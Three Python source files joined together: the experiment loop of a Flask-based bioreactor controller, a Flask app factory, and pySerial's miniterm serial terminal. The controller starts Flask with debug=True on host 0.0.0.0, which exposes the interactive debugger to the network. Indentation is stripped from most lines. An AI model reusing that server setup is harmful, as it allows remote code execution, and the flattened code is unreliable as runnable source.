sysData[M]['Experiment']['startTime']=timeString
sysData[M]['Experiment']['startTimeRaw']=now
sysData[M]['Pump1']['direction']=1.0 #Sets pumps to go forward.
sysData[M]['Pump2']['direction']=1.0
turnEverythingOff(M)
SetOutputOn(M,'Thermostat',1)
sysDevices[M]['Experiment']=Thread(target = runExperiment, args=(M,'placeholder'))
sysDevices[M]['Experiment'].setDaemon(True)
sysDevices[M]['Experiment'].start();
else:
sysData[M]['Experiment']['ON']=0
sysData[M]['OD']['ON']=0
addTerminal(M,'Experiment Stopping at end of cycle')
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0)
SetOutputOn(M,'Stir',0)
SetOutputOn(M,'Thermostat',0)
return ('', 204)
def runExperiment(M,placeholder):
#Primary function for running an automated experiment.
M=str(M)
global sysData
global sysItems
global sysDevices
sysData[M]['Experiment']['threadCount']=(sysData[M]['Experiment']['threadCount']+1)%100
currentThread=sysData[M]['Experiment']['threadCount']
# Get time running in seconds
now=datetime.now()
elapsedTime=now-sysData[M]['Experiment']['startTimeRaw']
elapsedTimeSeconds=round(elapsedTime.total_seconds(),2)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']+1
addTerminal(M,'Cycle ' + str(sysData[M]['Experiment']['cycles']) + ' Started')
CycleTime=sysData[M]['Experiment']['cycleTime']
SetOutputOn(M,'Stir',0) #Turning stirring off
time.sleep(5.0) #Wait for liquid to settle.
if (sysData[M]['Experiment']['ON']==0):
turnEverythingOff(M)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']-1 # Cycle didn't finish, don't count it.
addTerminal(M,'Experiment Stopped')
return
sysData[M]['OD']['Measuring']=1 #Begin measuring - this flag is just to indicate that a measurement is currently being taken.
    #We now measure OD 4 times and take the average to reduce noise when in auto mode!
ODV=0.0
for i in [0, 1, 2, 3]:
MeasureOD(M)
ODV=ODV+sysData[M]['OD']['current']
time.sleep(0.25)
sysData[M]['OD']['current']=ODV/4.0
MeasureTemp(M,'Internal') #Measuring all temperatures
MeasureTemp(M,'External')
MeasureTemp(M,'IR')
MeasureFP(M) #And now fluorescent protein concentrations.
if (sysData[M]['Experiment']['ON']==0): #We do another check post-measurement to see whether we need to end the experiment.
turnEverythingOff(M)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']-1 # Cycle didn't finish, don't count it.
addTerminal(M,'Experiment Stopped')
return
    #Temporary Biofilm Section - the below makes the device record all spectral data for all LEDs each cycle.
# bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR','NIR']
# items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
# gains=['x10','x10','x10','x10','x10','x10','x10','x1']
# gi=-1
# for item in items:
# gi=gi+1
# SetOutputOn(M,item,1)
# GetSpectrum(M,gains[gi])
# SetOutputOn(M,item,0)
# for band in bands:
# sysData[M]['biofilm'][item][band]=int(sysData[M]['AS7341']['spectrum'][band])
sysData[M]['OD']['Measuring']=0
if (sysData[M]['OD']['ON']==1):
RegulateOD(M) #Function that calculates new target pump rates, and sets pumps to desired rates.
LightActuation(M,1)
if (sysData[M]['Custom']['ON']==1): #Check if we have enabled custom programs
        CustomThread=Thread(target = CustomProgram, args=(M,)) #We run this in a thread in case we are doing something slow; we don't want to hang up the main loop. The comma after M casts args as a tuple to prevent the thread iterating over the string M.
CustomThread.setDaemon(True)
CustomThread.start();
    Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 will be on for, following the RegulateOD call above.
    time.sleep(Pump2Ontime) #This pause prevents output pumping from happening at the same time as stirring.
SetOutputOn(M,'Stir',1) #Start stirring again.
    if(sysData[M]['Experiment']['cycles']%10==9): #Don't want the terminal getting unruly, so clear it every 10 cycles.
clearTerminal(M)
#######Below stores all the results for plotting later
sysData[M]['time']['record'].append(elapsedTimeSeconds)
sysData[M]['OD']['record'].append(sysData[M]['OD']['current'])
sysData[M]['OD']['targetrecord'].append( sysData[M]['OD']['target']*sysData[M]['OD']['ON'])
sysData[M]['Thermostat']['record'].append(sysData[M]['Thermostat']['target']*float(sysData[M]['Thermostat']['ON']))
sysData[M]['Light']['record'].append(float(sysData[M]['Light']['ON']))
sysData[M]['ThermometerInternal']['record'].append(sysData[M]['ThermometerInternal']['current'])
sysData[M]['ThermometerExternal']['record'].append(sysData[M]['ThermometerExternal']['current'])
sysData[M]['ThermometerIR']['record'].append(sysData[M]['ThermometerIR']['current'])
sysData[M]['Pump1']['record'].append(sysData[M]['Pump1']['target']*float(sysData[M]['Pump1']['ON']))
sysData[M]['Pump2']['record'].append(sysData[M]['Pump2']['target']*float(sysData[M]['Pump2']['ON']))
sysData[M]['Pump3']['record'].append(sysData[M]['Pump3']['target']*float(sysData[M]['Pump3']['ON']))
sysData[M]['Pump4']['record'].append(sysData[M]['Pump4']['target']*float(sysData[M]['Pump4']['ON']))
sysData[M]['GrowthRate']['record'].append(sysData[M]['GrowthRate']['current']*float(sysData[M]['Zigzag']['ON']))
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
sysData[M][FP]['BaseRecord'].append(sysData[M][FP]['Base'])
sysData[M][FP]['Emit1Record'].append(sysData[M][FP]['Emit1'])
if (sysData[M][FP]['Emit2Band']!= "OFF"):
sysData[M][FP]['Emit2Record'].append(sysData[M][FP]['Emit2'])
else:
sysData[M][FP]['Emit2Record'].append(0.0)
else:
sysData[M][FP]['BaseRecord'].append(0.0)
sysData[M][FP]['Emit1Record'].append(0.0)
sysData[M][FP]['Emit2Record'].append(0.0)
    #We downsample our records so that the data vectors being plotted in the web interface do not get unruly (an illustrative sketch of such a helper follows this function).
if (len(sysData[M]['time']['record'])>200):
downsample(M)
#### Writing Results to data files
csvData(M) #This command writes system data to a CSV file for future keeping.
#And intermittently write the setup parameters to a data file.
    if(sysData[M]['Experiment']['cycles']%10==1): #We only write the whole configuration file every 10 cycles since it is not that important.
TempStartTime=sysData[M]['Experiment']['startTimeRaw']
        sysData[M]['Experiment']['startTimeRaw']=0 #We temporarily set this to zero during the write since a raw datetime object cannot be serialised to JSON.
filename = sysData[M]['Experiment']['startTime'] + '_' + M + '.txt'
filename=filename.replace(":","_")
f = open(filename,'w')
simplejson.dump(sysData[M],f)
f.close()
sysData[M]['Experiment']['startTimeRaw']=TempStartTime
##### Written
if (sysData[M]['Experiment']['ON']==0):
turnEverythingOff(M)
addTerminal(M,'Experiment Stopped')
return
nowend=datetime.now()
elapsedTime2=nowend-now
elapsedTimeSeconds2=round(elapsedTime2.total_seconds(),2)
sleeptime=CycleTime-elapsedTimeSeconds2
if (sleeptime<0):
sleeptime=0
addTerminal(M,'Experiment Cycle Time is too short!!!')
time.sleep(sleeptime)
LightActuation(M,0) #Turn light actuation off if it is running.
addTerminal(M,'Cycle ' + str(sysData[M]['Experiment']['cycles']) + ' Complete')
#Now we run this function again if the automated experiment is still going.
if (sysData[M]['Experiment']['ON'] and sysData[M]['Experiment']['threadCount']==currentThread):
sysDevices[M]['Experiment']=Thread(target = runExperiment, args=(M,'placeholder'))
sysDevices[M]['Experiment'].setDaemon(True)
sysDevices[M]['Experiment'].start();
else:
turnEverythingOff(M)
addTerminal(M,'Experiment Stopped')
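#--- Illustrative sketch, not part of the original control code ---
#The downsample(M) helper called in runExperiment is defined elsewhere in this
#file. As a rough idea of what such a helper must do, the hypothetical function
#below halves a single record vector by averaging adjacent pairs of samples;
#the real helper operates on the sysData[M] record lists instead.
def _downsample_example(record):
    """Return a list half as long, averaging adjacent pairs of samples."""
    return [(record[i] + record[i + 1]) / 2.0 for i in range(0, len(record) - 1, 2)]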
if __name__ == '__main__':
initialiseAll()
application.run(debug=True,threaded=True,host='0.0.0.0',port=5000)
initialiseAll()
print(str(datetime.now()) + ' Start Up Complete')
|
__init__.py
|
import sys
#import webview
import threading
from dc.utils.commun import Commun
class App:
func = Commun()
def create_app(self):
"""Create the app from Blueprints"""
from flask import Flask
app = Flask(__name__)
from dc.views.users import user_bp
from dc.views.commun import com_bp
from dc.views.batches import batches_bp
# from fup.views.createbatch import createbatch
# from fup.views.updatebatch import updatebatch
app.register_blueprint(user_bp)
app.register_blueprint(com_bp)
app.register_blueprint(batches_bp)
# app.register_blueprint(createbatch)
# app.register_blueprint(updatebatch)
return app
def run_server(self, run_in_browser=True, webview_name="App", width=1024, height=720):
"""Run in browser or in pywebview browser"""
app = self.create_app()
if run_in_browser:
conf = self.func.config_info()
port_nbr = int(conf["port"])
app.run(host='127.0.0.1', port=port_nbr, debug=True)
        else:
            import webview  # imported lazily here so the browser-only path above does not require pywebview to be installed
            def start_server():
                app.run()
            if __name__ == '__main__':  # note: this guard only fires when the module is executed directly
                t = threading.Thread(target=start_server)
                t.daemon = True
                t.start()
                webview.create_window(webview_name, "http://127.0.0.1:5000/", width=width, height=height)
                sys.exit()
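# Illustrative usage (not part of the original module; assumes dc.utils.commun
# and the dc.views blueprints are importable, and that config_info() returns a
# dict with a "port" key):
#
#   from dc import App
#   App().run_server(run_in_browser=True)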
|
miniterm.py
|
#!/home/paulo/Área de Trabalho/gnss-iot-server/site/ENV/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
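# For example (illustrative): key_description('\x03') returns 'Ctrl+C', while a
# printable key such as 'a' is returned as its repr, "'a'".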
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
    # switch terminal temporarily to normal mode (e.g. to get user input);
    # see the illustrative note directly after this class.
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
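# Illustrative note (not part of the original tool): the context manager above
# lets callers temporarily restore normal (line-buffered, echoing) terminal
# mode, e.g. to read a whole line from the user, and automatically switch back
# to raw single-key mode afterwards:
#
#   with console:                      # __enter__ calls cleanup() (normal mode)
#       filename = sys.stdin.readline()
#                                      # __exit__ calls setup() (raw mode again)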
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
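# Example (illustrative, not part of the original tool): a further filter can be
# added by subclassing Transform and registering it here; the hypothetical
# "upper" filter below would then be selectable with "--filter upper".
class _UpperExample(Transform):
    """Illustrative filter: show received text in upper case"""
    def rx(self, text):
        return text.upper()
# TRANSFORMATIONS['upper'] = _UpperExample  # uncomment to make the example selectable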
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
    Handle special keys from the console to show menu etc. (An illustrative
    programmatic usage sketch follows this class.)
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':  # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
        elif c in 'sS':  # S -> change to space parity (unreachable here: 'sS' is already consumed by the suspend_port branch above)
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
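# Illustrative programmatic use of Miniterm (not part of the original script,
# which is normally driven via main() below; the port name is an assumption):
#
#   ser = serial.serial_for_url('/dev/ttyUSB0', 115200, timeout=1)
#   term = Miniterm(ser, echo=False, eol='crlf', filters=('default',))
#   term.set_rx_encoding('UTF-8')
#   term.set_tx_encoding('UTF-8')
#   term.start()
#   try:
#       term.join(True)
#   except KeyboardInterrupt:
#       pass
#   term.join()
#   term.close()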
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
